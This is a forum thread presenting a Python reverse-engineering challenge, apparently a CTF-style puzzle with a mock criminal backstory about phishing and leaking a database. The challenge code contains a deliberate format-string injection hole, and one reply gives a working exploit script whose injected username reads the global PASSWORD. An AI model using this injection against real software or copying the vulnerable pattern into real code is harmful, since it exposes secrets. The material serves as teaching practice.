Python adventures 01

Reverse Engineering Challenges
1

Hey amigo,

A common friend said you can help me out, you’ll be rewarded for your time - handsomely - don’t worry.

We phished some buffoon to get access, but this stands in our way to leak their entire database, it’s supposed to spit out some numbers we can use as an access code. Johnny said you’ll need Python 3.6 or 3.7 to run it (I’m not good with numbers, see if it runs FFS), and then give us the code.

import random

PASSWORD = random.weibullvariate(alpha=13, beta=37)


class InvalidUsernameException(BaseException):
    def __init__(self, invalid_username: str) -> None:
        print(
            f"'{invalid_username.format(error=self)}' "
            f"is not recognised as an authorised user, "
            f"but login is permitted with the secret key."
        )


class InvalidPasswordException(BaseException):
    def __init__(self):
        print("Invalid password provided. Authorities have been informed.")


def grant_access():
    print(
        f"*** Access Granted! ***\n\n"
        f"  The Shirai Ryu are ninja, Liu Kang\n\n"
        f"The access code is: {PASSWORD / random.triangular()}"
    )


def check_password(user_password: str) -> None:
    if user_password != str(PASSWORD):
        raise InvalidPasswordException()


if __name__ == "__main__":
    username = input("Username: ")
    password = PASSWORD

    try:
        if username != "the_mighty_snail":
            raise InvalidUsernameException(username)
    except InvalidUsernameException:
        password = input("Secret: ")
    finally:
        check_password(password)
        grant_access()

Hint 1

The idiot who wrote it messed up: the hard coded account doesn’t even work, because there’s a type mismatch between the passwords, so don’t bother

Hint 2

I wonder what the fuck was this guy thinking when he implemented InvalidUsernameException. I bet he showed that code around with pride and shit

Hint 3

Ah yeah, Nicky said there’s no sanitation on the username you enter, and you might be able to run some python bullshit there. Don’t care, just give me the code!

5 Likes
2

Hey @n00bi3s - is this something you’d be interested in?

1 Like
3

Thanks @hacker_snail! This looks very interesting! I’ll give it a shot :slight_smile:

4

This is what I got:

*** Access Granted! ***

The Shirai Ryu are ninja, Liu Kang

The access code is: 23.4824998086134

3 Likes
5

Well done (that was fast!) - the access code is random, just added it for fun. I hope you liked it <3

6

Awesome challenge. But still figured out the way how to throw that bullshit in python3 haha

7

This was a fantastic challenge. Took me many days to get this through. Thanks for constant support @hacker_snail ! I learnt a lot :slight_smile: Already in love with the community :slight_smile:

8

Maybe I’m missing the point here.

It’s supposed to spit out some numbers we can use as an access code. […] Give us the code.

This seems too simple. I saved the provided code as challenge.py. Then I created a second piece of code called crack.py:

import challenge
challenge.grant_access()

That’s all it takes. I run crack.py:

*** Access Granted! ***

  The Shirai Ryu are ninja, Liu Kang

The access code is: 19.388974297289792

Am I missing the point here?

9

Thanks @hacker_snail! That was a fantastic challenge.

Exploit in python 
#!/usr/bin/env python
import subprocess
import re

if __name__ == '__main__':
   regex = re.compile("'(.+)'")

   proc = subprocess.Popen(['python3.7', './adventure_01.py'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
   proc.stdin.write(b"{error.__init__.__globals__[PASSWORD]}\n")
   proc.stdin.flush()

   line = proc.stdout.readline().decode("utf-8")
   password = regex.findall(line)[0]

   proc.stdin.write((password + "\n").encode("utf-8"))
   proc.stdin.flush()
   proc.stdin.close()

   lines = proc.stdout.readlines()
   print("".join([line.decode("utf-8") for line in lines]))

   proc.terminate()
2 Likes